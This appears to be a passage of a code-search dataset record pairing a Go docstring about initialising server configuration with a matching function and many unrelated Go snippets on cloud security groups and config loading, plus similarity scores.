{\n\t\t\t\tif inElement != (*other)[i] {\n\t\t\t\t\treturn false\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\n\tif in.Region != other.Region {\n\t\treturn false\n\t}\n\n\treturn true\n}", "func (r *ReconcileSecurityGroup) Reconcile(request reconcile.Request) (reconcile.Result, error) {\n\t// Fetch the SecurityGroup instance\n\tinstance := &openstackv1beta1.SecurityGroup{}\n\terr := r.Get(context.TODO(), request.NamespacedName, instance)\n\tif err != nil {\n\t\tif errors_.IsNotFound(err) {\n\t\t\tlog.Info(\"Debug: instance not found\", \"SecurityGroup\", instance.Name)\n\n\t\t\treturn reconcile.Result{}, nil\n\t\t}\n\t\t// Error reading the object - requeue the request.\n\t\treturn reconcile.Result{}, err\n\t}\n\n\tlog.Info(\"Info: Start reconcile\", \"sg\", instance.Name)\n\tif instance.ObjectMeta.DeletionTimestamp.IsZero() {\n\t\tlog.Info(\"Debug: deletion timestamp is zero\")\n\t\tif err := r.setFinalizer(instance); err != nil {\n\t\t\treturn reconcile.Result{}, err\n\t\t}\n\t} else {\n\t\treturn r.runFinalizer(instance)\n\t}\n\n\ttenant, err := r.osClient.GetTenantByName(os.Getenv(\"OS_TENANT_NAME\"))\n\tif err != nil {\n\t\treturn reconcile.Result{}, err\n\t}\n\n\tvar sg *groups.SecGroup\n\n\t// Check if the SecurityGroup already exists\n\tsg, err = r.osClient.GetSecurityGroup(instance.Status.ID)\n\tif err != nil {\n\t\tswitch err.(type) {\n\t\tcase gophercloud.ErrDefault404:\n\t\t\trand.Seed(time.Now().Unix())\n\n\t\t\tlog.Info(\"Creating SG\", \"name\", instance.Spec.Name)\n\t\t\tname := fmt.Sprintf(\"%s-%s\", instance.Spec.Name, r.osClient.RandomString())\n\n\t\t\tsg, err = r.osClient.CreateSecurityGroup(name, \"\", tenant.ID)\n\t\t\tif err != nil {\n\t\t\t\tlog.Info(\"Error\", \"msg\", err.Error())\n\t\t\t}\n\t\t\tinstance.Status.ID = sg.ID\n\t\t\tinstance.Status.Name = sg.Name\n\t\t\tlog.Info(\"Success creating SG\", \"name\", instance.Spec.Name, \"id\", sg.ID)\n\t\tdefault:\n\t\t\tlog.Info(\"Debug: errorrrrrr\")\n\t\t\treturn reconcile.Result{}, err\n\t\t}\n\t}\n\n\t// Resource側のルールがない場合、SGにルールを追加\n\tfor _, rule := range instance.Spec.Rules {\n\t\texists := false\n\t\tfor _, existsRule := range sg.Rules {\n\t\t\tif rule.RemoteIpPrefix == existsRule.RemoteIPPrefix && rule.PortRangeMax == existsRule.PortRangeMax && rule.PortRangeMin == existsRule.PortRangeMin {\n\t\t\t\texists = true\n\t\t\t}\n\t\t}\n\n\t\tif !exists {\n\t\t\tr.addRule(sg.ID, rule)\n\t\t\tif err != nil {\n\t\t\t\tlog.Info(\"Error\", \"addRule\", err.Error())\n\t\t\t\treturn reconcile.Result{}, err\n\t\t\t}\n\t\t}\n\t}\n\n\t// SGのルールがResource側にない場合、ルールを削除\n\tfor _, existRule := range sg.Rules {\n\t\tdelete := true\n\t\tfor _, rule := range instance.Spec.Rules {\n\t\t\tif existRule.RemoteIPPrefix == rule.RemoteIpPrefix && existRule.PortRangeMax == rule.PortRangeMax && existRule.PortRangeMin == rule.PortRangeMin {\n\t\t\t\tdelete = false\n\t\t\t}\n\t\t}\n\t\tif delete {\n\t\t\tlog.Info(\"Deleting SG Rule\", \"cidr\", existRule.RemoteIPPrefix, \"port\", fmt.Sprintf(\"%d-%d\", existRule.PortRangeMin, existRule.PortRangeMax))\n\t\t\terr = r.osClient.DeleteSecurityGroupRule(existRule.ID)\n\t\t\tif err != nil {\n\t\t\t\treturn reconcile.Result{}, err\n\t\t\t}\n\t\t\tlog.Info(\"Success to delete SG Rule\", \"cidr\", existRule.RemoteIPPrefix, \"port\", fmt.Sprintf(\"%d-%d\", existRule.PortRangeMin, existRule.PortRangeMax))\n\t\t}\n\t}\n\n\tvar nodes v1.NodeList\n\tlistOpts := client.ListOptions{\n\t\tRaw: &metav1.ListOptions{LabelSelector: labelSelector(instance)},\n\t}\n\terr = r.List(context.Background(), &listOpts, &nodes)\n\tif err != nil {\n\t\tlog.Info(\"Error\", \"Failed to NodeList\", err.Error())\n\t\treturn reconcile.Result{}, err\n\t}\n\n\texistsNodeIDs := []string{}\n\tfor _, node := range nodes.Items {\n\t\texistsNodeIDs = append(existsNodeIDs, strings.ToLower(node.Status.NodeInfo.SystemUUID))\n\t}\n\n\tfor _, id := range instance.Status.Nodes {\n\t\tif !containsString(existsNodeIDs, id) {\n\t\t\tlog.Info(\"Info\", \"Dettach SG from Server\", strings.ToLower(id))\n\t\t\tr.osClient.DettachSG(strings.ToLower(id), sg.Name)\n\t\t\tinstance.Status.Nodes = removeString(instance.Status.Nodes, id)\n\t\t}\n\t}\n\n\tfor _, node := range nodes.Items {\n\t\tid := node.Status.NodeInfo.SystemUUID\n\t\thasSg, err := r.osClient.ServerHasSG(strings.ToLower(id), sg.Name)\n\t\tif err != nil {\n\t\t\tlog.Info(\"Error\", \"Failed to ServerHasSG\", err.Error())\n\t\t\treturn reconcile.Result{}, err\n\t\t}\n\n\t\tif !hasSg {\n\t\t\tlog.Info(\"Info\", \"Attach SG to Server\", strings.ToLower(id))\n\t\t\tif err = r.osClient.AttachSG(strings.ToLower(id), sg.Name); err != nil {\n\t\t\t\tlog.Info(\"Debug\", \"failed to attach sg\", err.Error())\n\t\t\t\treturn reconcile.Result{}, err\n\t\t\t}\n\t\t\tinstance.Status.Nodes = append(instance.Status.Nodes, strings.ToLower(id))\n\t\t}\n\t}\n\n\tif err := r.Status().Update(context.Background(), instance); err != nil {\n\t\tlog.Info(\"Debug\", \"failed to update sg\", err.Error())\n\t\treturn reconcile.Result{}, err\n\t}\n\n\tlog.Info(\"Info: Success reconcile\", \"sg\", instance.Name)\n\treturn reconcile.Result{RequeueAfter: 60 * time.Second}, nil\n}", "func (s *SubnetListener) ListSecurityGroups(inctx context.Context, in *protocol.SecurityGroupSubnetBindRequest) (_ *protocol.SecurityGroupBondsResponse, err error) {\n\tdefer fail.OnExitConvertToGRPCStatus(inctx, &err)\n\tdefer fail.OnExitLogError(inctx, &err)\n\tdefer fail.OnExitWrapError(inctx, &err, \"cannot list Security Groups bound to Subnet\")\n\n\tif s == nil {\n\t\treturn nil, fail.InvalidInstanceError()\n\t}\n\tif in == nil {\n\t\treturn nil, fail.InvalidParameterError(\"in\", \"cannot be nil\")\n\t}\n\tif inctx == nil {\n\t\treturn nil, fail.InvalidParameterError(\"inctx\", \"cannot be nil\")\n\t}\n\n\tnetworkRef, _ := srvutils.GetReference(in.GetNetwork())\n\tsubnetRef, _ := srvutils.GetReference(in.GetSubnet())\n\tif subnetRef == \"\" {\n\t\treturn nil, fail.InvalidRequestError(\"neither name nor id given as reference for Subnet\")\n\t}\n\n\tjob, xerr := PrepareJob(inctx, in.GetNetwork().GetTenantId(), fmt.Sprintf(\"network/%s/subnet/%s/securitygroups/list\", networkRef, subnetRef))\n\tif xerr != nil {\n\t\treturn nil, xerr\n\t}\n\tdefer job.Close()\n\n\tstate := securitygroupstate.Enum(in.GetState())\n\n\thandler := handlers.NewSubnetHandler(job)\n\tbonds, xerr := handler.ListSecurityGroups(networkRef, subnetRef, state)\n\tif xerr != nil {\n\t\treturn nil, xerr\n\t}\n\n\tresp := converters.SecurityGroupBondsFromPropertyToProtocol(bonds, \"subnets\")\n\treturn resp, nil\n}", "func (_BaseAccessControlGroup *BaseAccessControlGroupTransactor) SetAccessGroupRights(opts *bind.TransactOpts, group common.Address, access_type uint8, access uint8) (*types.Transaction, error) {\n\treturn _BaseAccessControlGroup.contract.Transact(opts, \"setAccessGroupRights\", group, access_type, access)\n}", "func (mr *MockSecurityGroupServiceIfaceMockRecorder) ListSecurityGroups(p interface{}) *gomock.Call {\n\tmr.mock.ctrl.T.Helper()\n\treturn mr.mock.ctrl.RecordCallWithMethodType(mr.mock, \"ListSecurityGroups\", reflect.TypeOf((*MockSecurityGroupServiceIface)(nil).ListSecurityGroups), p)\n}", "func (o EciScalingConfigurationOutput) SecurityGroupId() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v *EciScalingConfiguration) pulumi.StringPtrOutput { return v.SecurityGroupId }).(pulumi.StringPtrOutput)\n}", "func (mtr *Msmsintprp3Metrics) SetSecurity(val metrics.Counter) error {\n\tmtr.metrics.SetCounter(val, mtr.getOffset(\"Security\"))\n\treturn nil\n}", "func (mtr *Msmsintprp5Metrics) SetSecurity(val metrics.Counter) error {\n\tmtr.metrics.SetCounter(val, mtr.getOffset(\"Security\"))\n\treturn nil\n}", "func (_BaseAccessControlGroup *BaseAccessControlGroupTransactor) SetAccessRights(opts *bind.TransactOpts) (*types.Transaction, error) {\n\treturn _BaseAccessControlGroup.contract.Transact(opts, \"setAccessRights\")\n}", "func (m *MockSecurityGroupServiceIface) ListSecurityGroups(p *ListSecurityGroupsParams) (*ListSecurityGroupsResponse, error) {\n\tm.ctrl.T.Helper()\n\tret := m.ctrl.Call(m, \"ListSecurityGroups\", p)\n\tret0, _ := ret[0].(*ListSecurityGroupsResponse)\n\tret1, _ := ret[1].(error)\n\treturn ret0, ret1\n}", "func (mtr *Msmsintprp4Metrics) SetSecurity(val metrics.Counter) error {\n\tmtr.metrics.SetCounter(val, mtr.getOffset(\"Security\"))\n\treturn nil\n}", "func (m *User) SetSchools(value []string)() {\n m.schools = value\n}", "func (o *CloudAwsVirtualMachineAllOf) GetSecurityGroupsOk() ([]CloudAwsSecurityGroupRelationship, bool) {\n\tif o == nil || o.SecurityGroups == nil {\n\t\treturn nil, false\n\t}\n\treturn o.SecurityGroups, true\n}", "func (provider *ResourceProvider) SecurityGroup(id string) (*reachAWS.SecurityGroup, error) {\n\tinput := &ec2.DescribeSecurityGroupsInput{\n\t\tGroupIds: []*string{\n\t\t\taws.String(id),\n\t\t},\n\t}\n\tresult, err := provider.ec2.DescribeSecurityGroups(input)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tif err = ensureSingleResult(len(result.SecurityGroups), \"security group\", id); err != nil {\n\t\treturn nil, err\n\t}\n\n\tsecurityGroup := newSecurityGroupFromAPI(result.SecurityGroups[0])\n\treturn &securityGroup, nil\n}", "func (s *applicationSecurityGroupLister) ApplicationSecurityGroups(namespace string) ApplicationSecurityGroupNamespaceLister {\n\treturn applicationSecurityGroupNamespaceLister{indexer: s.indexer, namespace: namespace}\n}", "func (o *FiltersSecurityGroup) SetOutboundRuleSecurityGroupIds(v []string) {\n\to.OutboundRuleSecurityGroupIds = &v\n}", "func (mtr *Msmsintprp2Metrics) SetSecurity(val metrics.Counter) error {\n\tmtr.metrics.SetCounter(val, mtr.getOffset(\"Security\"))\n\treturn nil\n}" ]
[ "0.7153404", "0.70500696", "0.70451057", "0.69159067", "0.6855702", "0.6766927", "0.66547847", "0.6568775", "0.63600767", "0.61523193", "0.5877236", "0.5828111", "0.5696654", "0.5696654", "0.56905776", "0.56866765", "0.56348604", "0.5631561", "0.56126946", "0.5588025", "0.5559615", "0.5515045", "0.54936177", "0.5488267", "0.5458155", "0.5458155", "0.5454099", "0.54470545", "0.54399484", "0.5436244", "0.5397594", "0.5390862", "0.5385071", "0.53754646", "0.53747094", "0.53579515", "0.53535116", "0.5297217", "0.52418256", "0.5237798", "0.5187828", "0.5186428", "0.5179841", "0.517448", "0.5169926", "0.5161695", "0.5143444", "0.5056319", "0.50496304", "0.49520352", "0.490921", "0.48905897", "0.4821615", "0.48070645", "0.4744364", "0.47236216", "0.47232783", "0.47178277", "0.47041795", "0.46910548", "0.4678651", "0.46708453", "0.46627578", "0.46595436", "0.46501455", "0.46451193", "0.46433812", "0.4612558", "0.4602799", "0.46011275", "0.45947072", "0.45836726", "0.45741773", "0.45284802", "0.45231774", "0.45121548", "0.44870815", "0.44789192", "0.44778705", "0.44778433", "0.44749138", "0.44746435", "0.4471681", "0.44604328", "0.4449663", "0.4434497", "0.44310668", "0.44211626", "0.44142067", "0.44094518", "0.4404903", "0.43970335", "0.4397017", "0.43900272", "0.43791085", "0.43630636", "0.4361219", "0.43610245", "0.4358146", "0.4339889" ]
0.7528008
0
newConfig initialize a new server config, saves env parameters if found, otherwise use default parameters
func newConfig(envParams envParams) error { // Initialize server config. srvCfg := newServerConfigV14() // If env is set for a fresh start, save them to config file. if globalIsEnvCreds { srvCfg.SetCredential(envParams.creds) } if globalIsEnvBrowser { srvCfg.SetBrowser(envParams.browser) } // Create config path. if err := createConfigDir(); err != nil { return err } // hold the mutex lock before a new config is assigned. // Save the new config globally. // unlock the mutex. serverConfigMu.Lock() serverConfig = srvCfg serverConfigMu.Unlock() // Save config into file. return serverConfig.Save() }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func newConfig() (*rest.Config, error) {\n // try in cluster config first, it should fail quickly on lack of env vars\n cfg, err := inClusterConfig()\n if err != nil {\n cfg, err = clientcmd.BuildConfigFromFlags(\"\", clientcmd.RecommendedHomeFile)\n if err != nil {\n return nil, errors.Wrap(err, \"failed to get InClusterConfig and Config from kube_config\")\n }\n }\n return cfg, nil\n}", "func newServerConfig(fname, id, name, passWord, serverKey string) (err error) {\n\tconfig := Config{\n\t\tid,\n\t\tname,\n\t\t\"server\",\n\t\tpassWord,\n\t\tserverKey,\n\t\tDEFAULT_SERVER_URL,\n\t\tDEFAULT_PROCESS_USER,\n\t\tDEFAULT_PROCESS_LOCK,\n\t\tDEFAULT_PROCESS_LOG,\n\t\tDEFAULT_BASE_DIR,\n\t\tDEFAULT_DATA_DIR,\n\t\tDEFAULT_HTTP_LISTEN,\n\t\tfname,\n\t}\n\n\treturn SaveConfig(config)\n}", "func newConfig(appName string, pathToKeybase string, log Log, ignoreSnooze bool) (*config, error) {\n\tcfg := newDefaultConfig(appName, pathToKeybase, log, ignoreSnooze)\n\terr := cfg.load()\n\treturn &cfg, err\n}", "func newConfig() *Config {\n\treturn &Config{\n\t\tgeneral{\n\t\t\tVerbose: false,\n\t\t},\n\t\tserver{\n\t\t\tType: \"http\",\n\t\t\tHost: \"0.0.0.0\",\n\t\t},\n\t\tmongo{\n\t\t\tHost: \"0.0.0.0:27017\",\n\t\t\tDatabase: \"etlog\",\n\t\t\tCollection: \"logs\",\n\t\t},\n\t}\n}", "func New() *Config {\n\t// Keep only one instance of server config\n\tif serverConfig != nil {\n\t\treturn serverConfig\n\t}\n\n\t// Get the current environment\n\tenvironment := getEnv(\"_APP_ENV\", \"development\")\n\n\t// If not running on stating nor production, fallback to local configs\n\tif environment != \"staging\" && environment != \"production\" {\n\t\tserverConfig = &Config{\n\t\t\tEnvironment: \"development\",\n\t\t\tDelay: 5,\n\t\t\tMonitoringQuantity: 5,\n\t\t}\n\t\treturn serverConfig\n\t}\n\n\t// For prod and staging\n\tserverConfig = &Config{\n\t\tEnvironment: environment,\n\t}\n\n\treturn serverConfig\n}", "func newConfig() *Config {\n\n\tc := &Config{}\n\tvar logLevel, bServers, dServers string\n\n\tflag.StringVar(&c.ControlAddress, \"controlAddress\", \"localhost:4000\",\n\t\t\"Control process IP address, default localhost:4000\")\n\n\tflag.BoolVar(&c.Broadcast, \"broadcast\", true,\n\t\t\"Set to false to squash actual broadcast.\")\n\n\tflag.IntVar(&c.Bclients, \"bClients\", 1,\n\t\t\"The number of broadcast clients; Default 1\")\n\n\tflag.IntVar(&c.Dclients, \"dClients\", 1,\n\t\t\"The number of deliver clients; Default 1\")\n\n\tflag.IntVar(&c.Channels, \"channels\", 1,\n\t\t\"The number of channels; Default 1\")\n\n\tflag.StringVar(&bServers, \"bServers\", \"\",\n\t\t\"A comma-separated list of IP:PORT of broadcast servers to target; Required\")\n\n\tflag.StringVar(&dServers, \"dServers\", \"\",\n\t\t\"A comma-separated list of IP:PORT of deliver servers to target; Defaults to broadcast szervers\")\n\n\tflag.IntVar(&c.Transactions, \"transactions\", 1,\n\t\t\"The number of transactions broadcast to each client's servers; Default 1\")\n\n\tflag.IntVar(&c.Payload, \"payload\", TxHeaderSize,\n\t\t\"Payload size in bytes; Minimum/default is the performance header size (56 bytes)\")\n\n\tflag.IntVar(&c.Burst, \"burst\", 1,\n\t\t\"The number of transactions burst to each server during broadcast; Dafault 1\")\n\n\tflag.DurationVar(&c.Delay, \"delay\", 0,\n\t\t\"The delay between bursts, in the form required by time.ParseDuration(); Default is no delay\")\n\n\tflag.IntVar(&c.Window, \"window\", 100,\n\t\t\"The number of blocks allowed to be delivered without an ACK; Default 100\")\n\n\tflag.IntVar(&c.AckEvery, \"ackEvery\", 70,\n\t\t\"The deliver client will ACK every (this many) blocks; Default 70\")\n\n\tflag.DurationVar(&c.Timeout, \"timeout\", 30*time.Second,\n\t\t\"The initialization timeout, in the form required by time.ParseDuration(); Default 30s\")\n\n\tflag.BoolVar(&c.LatencyAll, \"latencyAll\", false,\n\t\t\"By default, only block latencies are reported. Set -latencyAll=true to report all transaction latencies\")\n\n\tflag.StringVar(&c.LatencyDir, \"latencyDir\", \"\",\n\t\t\"The directory to contain latency files; These files are only created if -latencyDir is specified\")\n\n\tflag.StringVar(&c.LatencyPrefix, \"latencyPrefix\", \"client\",\n\t\t\"Prefix for latency file names\")\n\n\tflag.StringVar(&logLevel, \"logLevel\", \"info\",\n\t\t\"The global logging level; Default 'info'\")\n\n\tflag.StringVar(&c.ControlLogging, \"controlLogging\", \"\",\n\t\t\"Override logging level for the 'control' process\")\n\n\tflag.StringVar(&c.BroadcastLogging, \"broadcastLogging\", \"\",\n\t\t\"Override logging level for the 'broadcast' processes\")\n\n\tflag.StringVar(&c.DeliverLogging, \"deliverLogging\", \"\",\n\t\t\"Override logging level for the 'deliver' processes\")\n\n\tflag.Parse()\n\n\tif c.ControlLogging == \"\" {\n\t\tc.ControlLogging = logLevel\n\t}\n\tif c.BroadcastLogging == \"\" {\n\t\tc.BroadcastLogging = logLevel\n\t}\n\tif c.DeliverLogging == \"\" {\n\t\tc.DeliverLogging = logLevel\n\t}\n\n\tinitLogging(c.ControlLogging)\n\n\trequireUint16(\"bclients\", c.Bclients)\n\trequireUint16(\"dclients\", c.Dclients)\n\trequireUint16(\"channels\", c.Channels)\n\trequireNonEmpty(\"bServers\", bServers)\n\tif dServers == \"\" {\n\t\tdServers = bServers\n\t}\n\trequireUint32(\"transactions\", c.Transactions)\n\trequirePosInt(\"payload\", c.Payload)\n\tif c.Payload < TxHeaderSize {\n\t\tlogger.Infof(\"Payload size will be set to the default (%d bytes)\\n\",\n\t\t\tTxHeaderSize)\n\t\tc.Payload = TxHeaderSize\n\t}\n\trequirePosInt(\"burst\", c.Burst)\n\trequirePosDuration(\"delay\", c.Delay)\n\trequirePosInt(\"window\", c.Window)\n\trequirePosInt(\"ackevery\", c.AckEvery)\n\trequireLE(\"ackevery\", \"window\", c.AckEvery, c.Window)\n\trequirePosDuration(\"timeout\", c.Timeout)\n\n\tc.Bservers = strings.Split(bServers, \",\")\n\tc.NumBservers = len(c.Bservers)\n\n\tc.Dservers = strings.Split(dServers, \",\")\n\tc.NumDservers = len(c.Dservers)\n\n\tlogger.Infof(\"Configuration\")\n\tlogger.Infof(\" Broadcast Servers: %d: %v\", c.NumBservers, c.Bservers)\n\tlogger.Infof(\" Broadcast Clients: %d\", c.Bclients)\n\tlogger.Infof(\" Deliver Servers : %d: %v\", c.NumDservers, c.Dservers)\n\tlogger.Infof(\" Deliver Clients : %d\", c.Dclients)\n\tlogger.Infof(\" Channels : %d\", c.Channels)\n\tlogger.Infof(\" Transactions : %d\", c.Transactions)\n\tlogger.Infof(\" Payload : %d\", c.Payload)\n\tlogger.Infof(\" Burst : %d\", c.Burst)\n\tlogger.Infof(\" Delay : %s\", c.Delay.String())\n\tlogger.Infof(\" Window : %d\", c.Window)\n\tlogger.Infof(\" AckEvery : %d\", c.AckEvery)\n\tlogger.Infof(\" Broadcast? : %v\", c.Broadcast)\n\n\tc.TotalBroadcastClients =\n\t\tuint64(c.NumBservers) * uint64(c.Channels) * uint64(c.Bclients)\n\tc.TxBroadcastPerClient = uint64(c.Transactions)\n\tc.BytesBroadcastPerClient = c.TxBroadcastPerClient * uint64(c.Payload)\n\tc.TotalTxBroadcast = uint64(c.TotalBroadcastClients) * c.TxBroadcastPerClient\n\tc.TotalBytesBroadcast = c.TotalTxBroadcast * uint64(c.Payload)\n\n\tc.TotalDeliverClients =\n\t\tuint64(c.NumDservers) * uint64(c.Channels) * uint64(c.Dclients)\n\tc.TxDeliveredPerClient =\n\t\tuint64(c.NumBservers) * uint64(c.Bclients) * uint64(c.Transactions)\n\tc.BytesDeliveredPerClient = c.TxDeliveredPerClient * uint64(c.Payload)\n\tc.TotalTxDelivered = c.TxDeliveredPerClient * c.TotalDeliverClients\n\tc.TotalBytesDelivered = c.TotalTxDelivered * uint64(c.Payload)\n\n\treturn c\n}", "func newConfig() *Config {\n\t// TODO: use config as default, allow setting some values per-job\n\t// and prevent config changes affecting already-running tasks\n\treturn &Config{\n\t\tPath: DefaultPath,\n\t\tDatastorePrefix: \"MP_\",\n\t\tDefaultQueue: \"\",\n\t\tShards: 8,\n\t\tOversampling: 32,\n\t\tLeaseDuration: time.Duration(30) * time.Second,\n\t\tLeaseTimeout: time.Duration(10)*time.Minute + time.Duration(30)*time.Second,\n\t\tTaskTimeout: time.Duration(10)*time.Minute - time.Duration(30)*time.Second,\n\t\tCursorTimeout: time.Duration(50) * time.Second,\n\t\tRetries: 31,\n\t\tLogVerbose: false,\n\t\tHost: \"\",\n\t}\n}", "func newConfig() *config {\n\treturn &config{\n\t\tAddr: \":80\",\n\t\tCacheSize: 1000,\n\t\tLogLevel: \"info\",\n\t\tRequestTimeout: 3000,\n\t\tTargetAddr: \"https://places.aviasales.ru\",\n\t}\n}", "func NewConfig(newServices []services.ServiceConfig, newGroups []services.ServiceGroupConfig) Config {\n\tlog.Printf(\"Creating new config with %d services and %d groups.\\n\", len(newServices), len(newGroups))\n\n\t// Find Env settings common to all services\n\tvar allEnvSlices [][]string\n\tfor _, s := range newServices {\n\t\tallEnvSlices = append(allEnvSlices, s.Env)\n\t}\n\tenv := stringSliceIntersect(allEnvSlices)\n\n\t// Remove common settings from services\n\tvar svcs []services.ServiceConfig\n\tfor _, s := range newServices {\n\t\ts.Env = stringSliceRemoveCommon(env, s.Env)\n\t\tsvcs = append(svcs, s)\n\t}\n\n\tcfg := Config{\n\t\tEnv: env,\n\t\tServices: svcs,\n\t\tGroups: []GroupDef{},\n\t}\n\n\tcfg.AddGroups(newGroups)\n\n\tlog.Printf(\"Config created: %v\", cfg)\n\n\treturn cfg\n}", "func newConfigServer() *ConfigServer {\n\treturn &ConfigServer{}\n}", "func newConfig() Config {\n\treturn Config{\n\t\tDefaultContainerConfig: newDefaultContainerConfig(),\n\t\tContainersConfig: map[string]ContainerConfig{},\n\t\tExclude: []string{},\n\t}\n}", "func loadConfig(envParams envParams) error {\n\tconfigFile := getConfigFile()\n\tif _, err := os.Stat(configFile); err != nil {\n\t\treturn err\n\t}\n\n\tsrvCfg := &serverConfigV14{}\n\n\tqc, err := quick.New(srvCfg)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tif err = qc.Load(configFile); err != nil {\n\t\treturn err\n\t}\n\n\t// If env is set override the credentials from config file.\n\tif globalIsEnvCreds {\n\t\tsrvCfg.SetCredential(envParams.creds)\n\t}\n\n\tif globalIsEnvBrowser {\n\t\tsrvCfg.SetBrowser(envParams.browser)\n\t}\n\n\tif strings.ToLower(srvCfg.GetBrowser()) == \"off\" {\n\t\tglobalIsBrowserEnabled = false\n\t}\n\n\t// hold the mutex lock before a new config is assigned.\n\tserverConfigMu.Lock()\n\t// Save the loaded config globally.\n\tserverConfig = srvCfg\n\tserverConfigMu.Unlock()\n\n\tif serverConfig.Version != v14 {\n\t\treturn errors.New(\"Unsupported config version `\" + serverConfig.Version + \"`.\")\n\t}\n\n\treturn nil\n}", "func NewConfig(prefix string) *Config {\n\tc := &Config{Port: \"8000\", MaxRequestPerSec: 1}\n\tif err := envconfig.Process(prefix, c); err != nil {\n\t\tlog.Fatal(err)\n\t}\n\treturn c\n}", "func newConfig(old *Config, vars Vars) *Config {\n\tv := mergeVars(old.Vars, vars)\n\n\treturn &Config{\n\t\tAppID: old.AppID,\n\t\tVars: v,\n\t}\n}", "func newClientConfig(fname, id, name, serverKey, serverUrl string) (err error) {\n\tconfig := Config{\n\t\tid,\n\t\tname,\n\t\t\"client\",\n\t\t\"\",\n\t\tserverKey,\n\t\tserverUrl,\n\t\tDEFAULT_PROCESS_USER,\n\t\tDEFAULT_PROCESS_LOCK,\n\t\tDEFAULT_PROCESS_LOG,\n\t\tDEFAULT_BASE_DIR,\n\t\tDEFAULT_DATA_DIR,\n\t\tDEFAULT_HTTP_LISTEN,\n\t\tfname,\n\t}\n\n\treturn SaveConfig(config)\n}", "func DefaultServiceConfigFromEnv() Server {\n\tconfigOnce.Do(func() {\n\t\tconfig = Server{\n\t\t\tDatabase: Database{\n\t\t\t\tHost: util.GetEnv(\"PGHOST\", \"postgres\"),\n\t\t\t\tPort: util.GetEnvAsInt(\"PGPORT\", 5432),\n\t\t\t\tDatabase: util.GetEnv(\"PGDATABASE\", \"development\"),\n\t\t\t\tUsername: util.GetEnv(\"PGUSER\", \"dbuser\"),\n\t\t\t\tPassword: util.GetEnv(\"PGPASSWORD\", \"\"),\n\t\t\t\tAdditionalParams: map[string]string{\n\t\t\t\t\t\"sslmode\": util.GetEnv(\"PGSSLMODE\", \"disable\"),\n\t\t\t\t},\n\t\t\t\tMaxOpenConns: util.GetEnvAsInt(\"DB_MAX_OPEN_CONNS\", runtime.NumCPU()*2),\n\t\t\t\tMaxIdleConns: util.GetEnvAsInt(\"DB_MAX_IDLE_CONNS\", 1),\n\t\t\t\tConnMaxLifetime: time.Second * time.Duration(util.GetEnvAsInt(\"DB_CONN_MAX_LIFETIME_SEC\", 60)),\n\t\t\t},\n\t\t\tEcho: EchoServer{\n\t\t\t\tDebug: util.GetEnvAsBool(\"SERVER_ECHO_DEBUG\", false),\n\t\t\t\tListenAddress: util.GetEnv(\"SERVER_ECHO_LISTEN_ADDRESS\", \":8080\"),\n\t\t\t\tHideInternalServerErrorDetails: util.GetEnvAsBool(\"SERVER_ECHO_HIDE_INTERNAL_SERVER_ERROR_DETAILS\", true),\n\t\t\t\tBaseURL: util.GetEnv(\"SERVER_ECHO_BASE_URL\", \"http://localhost:8080\"),\n\t\t\t\tEnableCORSMiddleware: util.GetEnvAsBool(\"SERVER_ECHO_ENABLE_CORS_MIDDLEWARE\", true),\n\t\t\t\tEnableLoggerMiddleware: util.GetEnvAsBool(\"SERVER_ECHO_ENABLE_LOGGER_MIDDLEWARE\", true),\n\t\t\t\tEnableRecoverMiddleware: util.GetEnvAsBool(\"SERVER_ECHO_ENABLE_RECOVER_MIDDLEWARE\", true),\n\t\t\t\tEnableRequestIDMiddleware: util.GetEnvAsBool(\"SERVER_ECHO_ENABLE_REQUEST_ID_MIDDLEWARE\", true),\n\t\t\t\tEnableTrailingSlashMiddleware: util.GetEnvAsBool(\"SERVER_ECHO_ENABLE_TRAILING_SLASH_MIDDLEWARE\", true),\n\t\t\t},\n\t\t\tPaths: PathsServer{\n\t\t\t\t// Please ALWAYS work with ABSOLUTE (ABS) paths from ENV_VARS (however you may resolve a project-relative to absolute for the default value)\n\t\t\t\tAPIBaseDirAbs: util.GetEnv(\"SERVER_PATHS_API_BASE_DIR_ABS\", filepath.Join(util.GetProjectRootDir(), \"/api\")), // /app/api (swagger.yml)\n\t\t\t\tMntBaseDirAbs: util.GetEnv(\"SERVER_PATHS_MNT_BASE_DIR_ABS\", filepath.Join(util.GetProjectRootDir(), \"/assets/mnt\")), // /app/assets/mnt (user-generated content)\n\t\t\t},\n\t\t\tAuth: AuthServer{\n\t\t\t\tAccessTokenValidity: time.Second * time.Duration(util.GetEnvAsInt(\"SERVER_AUTH_ACCESS_TOKEN_VALIDITY\", 86400)),\n\t\t\t\tPasswordResetTokenValidity: time.Second * time.Duration(util.GetEnvAsInt(\"SERVER_AUTH_PASSWORD_RESET_TOKEN_VALIDITY\", 900)),\n\t\t\t\tDefaultUserScopes: util.GetEnvAsStringArr(\"SERVER_AUTH_DEFAULT_USER_SCOPES\", []string{\"app\"}),\n\t\t\t\tLastAuthenticatedAtThreshold: time.Second * time.Duration(util.GetEnvAsInt(\"SERVER_AUTH_LAST_AUTHENTICATED_AT_THRESHOLD\", 900)),\n\t\t\t},\n\t\t\tManagement: ManagementServer{\n\t\t\t\tSecret: util.GetMgmtSecret(\"SERVER_MANAGEMENT_SECRET\"),\n\t\t\t},\n\t\t\tMailer: Mailer{\n\t\t\t\tDefaultSender: util.GetEnv(\"SERVER_MAILER_DEFAULT_SENDER\", \"[email protected]\"),\n\t\t\t\tSend: util.GetEnvAsBool(\"SERVER_MAILER_SEND\", true),\n\t\t\t\tWebTemplatesEmailBaseDirAbs: util.GetEnv(\"SERVER_MAILER_WEB_TEMPLATES_EMAIL_BASE_DIR_ABS\", filepath.Join(util.GetProjectRootDir(), \"/web/templates/email\")), // /app/web/templates/email\n\t\t\t\tTransporter: util.GetEnvEnum(\"SERVER_MAILER_TRANSPORTER\", MailerTransporterMock.String(), []string{MailerTransporterSMTP.String(), MailerTransporterMock.String()}),\n\t\t\t},\n\t\t\tSMTP: transport.SMTPMailTransportConfig{\n\t\t\t\tHost: util.GetEnv(\"SERVER_SMTP_HOST\", \"mailhog\"),\n\t\t\t\tPort: util.GetEnvAsInt(\"SERVER_SMTP_PORT\", 1025),\n\t\t\t\tUsername: util.GetEnv(\"SERVER_SMTP_USERNAME\", \"\"),\n\t\t\t\tPassword: 